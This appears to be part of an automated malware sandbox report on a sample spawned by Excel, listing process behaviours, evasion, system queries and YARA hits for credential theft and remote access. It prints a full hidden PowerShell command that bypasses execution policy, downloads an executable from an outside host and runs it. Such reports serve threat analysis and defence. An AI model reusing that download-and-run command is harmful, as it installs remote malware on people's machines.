Code function: 5_2_001CECA8 LdrInitializeThunk,

5_2_001CECA8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp667.exe "C:\Users\user\AppData\Local\Temp\tmp667.exe"			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\svcost.exe "C:\Users\user\AppData\Roaming\svcost.exe"			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp667.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svcost.exe	Queries volume information: C:\Users\user\AppData\Roaming\svcost.exe VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp667.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

Source: Yara match	File source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 5.2.tmp667.exe.3695570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.477050261.000000000349A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.446711663.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.474407108.000000000256D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp667.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svcost.exe PID: 3996, type: MEMORYSTR